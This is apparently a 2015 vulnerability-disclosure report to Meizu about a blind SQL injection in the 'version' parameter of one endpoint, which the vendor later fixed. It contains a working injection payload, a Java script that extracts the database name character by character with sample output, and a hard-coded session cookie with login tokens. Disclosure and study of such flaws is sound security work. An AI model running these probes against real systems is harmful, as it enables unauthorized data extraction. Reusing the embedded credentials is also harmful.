2015-09-27: 细节已通知厂商并且等待厂商处理中
2015-09-27: 厂商已经确认,细节仅向厂商公开
2015-10-07: 细节向核心白帽子及相关领域专家公开
2015-10-09: 厂商已经修复漏洞并主动公开,细节向公众公开
小锤抠缝,大锤搞定听闻魅族刚发了PRO 5手机,特来捧场(来个内部价可好)。
站点:http://wan.meizu.com
漏洞URL:http://wan.meizu.com/praise/users/{此处为uuid}?version=20882&page=2
列举一例:ad25a188-856d-4a55-be31-28d6ef605319
构成URL:http://wan.meizu.com/praise/users/ad25a188-856d-4a55-be31-28d6ef605319?version=20882&page=2
注入点:version
payload: 20882' AND SUBSTRING(database(),2,1)='1' -- ,需要对其进行URL编码。
后台存在IPS之类,写方法来验证,以下是代码段(将就着看看):
package com.test;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLEncoder;

/**
 * Proof-of-concept from the report above: a boolean-based blind SQL injection
 * probe against the {@code version} query parameter of
 * {@code /praise/users/{uuid}}. Each request asks the server whether one
 * character of {@code database()} equals a candidate character; whether the
 * response body contains the string {@code "username"} is used as the
 * true/false oracle.
 *
 * <p>Defender's reading: the probe can only work if {@code version} reaches the
 * SQL statement as raw text (presumably via string concatenation — the server
 * side is not visible here). The fix is a parameterized query, plus rejecting a
 * non-numeric {@code version} before it reaches the data layer. In access or
 * WAF logs this traffic appears as a burst of requests to one URL that differ
 * only in {@code version}, which carries URL-encoded {@code '}, {@code AND} and
 * {@code SUBSTRING(}.
 *
 * @author 需求又改了
 */
public class MeizuRequest {

    /**
     * Performs an HTTP GET of {@code injectUrl} and returns the response body.
     * Response lines are concatenated without separators, so any line
     * structure in the body is lost. A browser-like header set and a
     * hard-coded session cookie (the reporter's own, from 2015) are sent on
     * every request.
     *
     * <p>Note: the reader is closed only on the success path; an exception
     * thrown from {@code readLine} leaks it. {@code Accept-Encoding: utf-8}
     * names a charset rather than a content encoding and is presumably
     * ignored by the server.
     *
     * @param injectUrl the full URL to request, already URL-encoded
     * @return the response body with line breaks removed
     * @throws IOException if the connection cannot be opened or read
     */
    public static String sendGet(String injectUrl) throws IOException {
        StringBuffer result = new StringBuffer();
        URL httpUrl = null;
        URLConnection connection = null;
        BufferedReader bufferedReader;
        httpUrl = new URL(injectUrl);
        connection = httpUrl.openConnection();
        // Fixed header set imitating a Firefox 41 browser session.
        connection.setRequestProperty("Host", "wan.meizu.com");
        connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0");
        connection.setRequestProperty("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        connection.setRequestProperty("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
        connection.setRequestProperty("Accept-Encoding", "utf-8");
        // Authenticated session cookie of the reporter; the endpoint was presumably reachable only when logged in.
        connection.setRequestProperty("Cookie", "_ga=GA1.2.1012299308.1443151870; Hm_lvt_2a0c04774115b182994cfcacf4c122e9=1443152293; _uid=23733490; _keyLogin=ea5f7c9b137f2ad76d2ddcfda65d9f; _rmtk=721da5fdc3f245ce2ff2a563107292; _uticket=hBIjVSJpsYarGtdHErnitiNkuHQHhE01icUfMZ_ALKwt5wLG-6WqX_rkp9dyVE9WjQWst3qhyNNVkYYO7Mnx9-o6GLBVRf49cN4wp0r2NqlPNJ94UY2Ri-8zzYj_Kgf2RVrf0o5scF-pAdj6rmSNGzRK5822rYSqHMtfKG524Ao*ybD7tpf3TyGfVGH2XomvdQ; subnavShow=1; wan.sid=s%3Ahb0gXZI9zjzGxL5Pqtp1jFw6sfuWrKJx.7W3TsX28Ee0Qpr3H5sI%2BzSvYkcLmY99QGKhjfa%2BEKIM; Hm_lvt_1081764f96e05731190620c8597200c4=1443164252,1443241887; customer_service_language=cn; Hm_lpvt_1081764f96e05731190620c8597200c4=1443253378");
        connection.setRequestProperty("Connection", "keep-alive");
        connection.connect();
        // Read the response body as UTF-8 and collapse it into one string.
        bufferedReader = new BufferedReader(new InputStreamReader(connection.getInputStream(),"utf-8"));
        String line;
        while ((line = bufferedReader.readLine()) != null) {
            result.append(line);
        }
        bufferedReader.close();
        return result.toString();
    }

    /**
     * Recovers the name of the current database one character at a time.
     * Despite the method name it reads {@code database()}, not a user record.
     *
     * <p>The query string is taken from {@code url} (everything after the
     * first {@code ?}; a URL without one throws
     * {@code ArrayIndexOutOfBoundsException} on the first line). For the
     * parameter named {@code injectParam}, every candidate character is tried
     * at every position 1..{@code userLen}; a hit is stored in
     * {@code userChars} and printed at once, a miss prints a dot. Because the
     * outer loop runs over candidates and the inner loop over positions, hits
     * are reported in candidate order rather than position order — which is
     * why the run shown in the report prints position 2, then 3, then 1.
     * Positions that no candidate matches remain {@code 'X'}.
     *
     * @param url         the target URL including its query string
     * @param injectParam the query parameter whose value is replaced by the probe
     * @param userLen     number of characters of {@code database()} to recover;
     *                    the author determined it beforehand (see the report text)
     * @throws IOException propagated from {@link #sendGet(String)}
     */
    public static void fetchUser(String url, String injectParam, int userLen) throws IOException {
        // Everything after the first '?'; assumes the URL has a query string.
        String paramsStr = url.split("\\?")[1];
        char[] userChars = new char[userLen];
        // Placeholder for positions that end up unmatched.
        for(int u = 0; u<userChars.length; u++) {
            userChars[u]='X';
        }
        if (!paramsStr.equals("") && !injectParam.equals("")) {
            String[] paramArr = paramsStr.split("&");
            for(int i=0; i < paramArr.length; i++) {
                int eqIndex = paramArr[i].indexOf("=");
                String param = paramArr[i].substring(0, eqIndex).trim();
                if(param.equals(injectParam.trim())) {
                    // Candidate alphabet: lowercase letters, digits and ASCII punctuation.
                    char[] payloads = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z', '1','2','3','4','5','6','7','8','9','0','.',',','/','<','>','?',':',';','\"','\'','[',']','{','}','|','\\', '=','+','-','_',')','(','*','&','^','%','$','#','@','!','~'};
                    // Narrower alphabet the author also tried:
                    //char[] payloads = {'1','2','3','4','5','6','7','8','9','0',':','.'};
                    for(int j=0; j < payloads.length; j++) {
                        // Decoded form of the probe built below, shown for position 2 and candidate '1':
                        //20882' AND SUBSTRING(database(),2,1)='1' --
                        // Percent-encode the candidate so punctuation survives inside the URL.
                        String payload = URLEncoder.encode(String.valueOf(payloads[j]), "utf-8");
                        for(int k=0; k < userLen; k++) {
                            // Hand-encoded probe: original value, then the SUBSTRING comparison for position k+1.
                            String payloadStr = "20882%27%20AND%20SUBSTRING%28database%28%29%2C" + (k+1) + "%2C1%29%3D%27"+ payload +"%27%20--%20";
                            // Replace the whole name=value pair with name=<probe>; other parameters stay as they are.
                            String injectUrl = url.replace(paramArr[i], param + "=" + payloadStr);
                            String result = MeizuRequest.sendGet(injectUrl);
                            // Oracle: a "true" answer is a body that contains "username".
                            if(result.indexOf("username") > 0) {
                                userChars[k] = payloads[j];
                                System.out.println("database() the " + (k+1) + " place is " + payloads[j]);
                            } else {
                                // k < userLen, so this holds only for k == 0: start a new line of dots per candidate.
                                if(k%userLen == 0) {
                                    System.out.print("\n.");
                                } else {
                                    System.out.print(".");
                                }
                            }
                        }
                    }
                    System.out.println("database() is " + String.valueOf(userChars));
                }
            }
        }
    }

    /**
     * Entry point: runs the probe against the example URL from the report,
     * targeting the {@code version} parameter with a three-character name length.
     *
     * @param args ignored
     */
    public static void main(String[] args) {
        String url = "http://wan.meizu.com/praise/users/ad25a188-856d-4a55-be31-28d6ef605319?version=20882&page=2";
        // Injection parameter and length of database(); the length was established separately (see the report text).
        try {
            MeizuRequest.fetchUser(url, "version", 3);
        } catch(Exception e) {
            // Message reads "exception while fetching the database name", followed by the cause.
            System.out.println("获取数据库名异常"+e.getMessage());
            e.printStackTrace();
        }
    }
}
其中 MeizuRequest.fetchUser(url, "version", 3); 中的 3 是数据库名的长度,可通过盲注判断,如下图:
运行结果:
.database() the 2 place is a.......................................database() the 3 place is n........................database() the 1 place is w......................................................................................................................................database() is wan
求高Rank,谢谢。结合业务做修复,你们更专业。
危害等级:高
漏洞Rank:12
确认时间:2015-09-27 14:14
感谢白帽子反馈问题,祝中秋快乐!
2015-10-09:修补完成。
内部价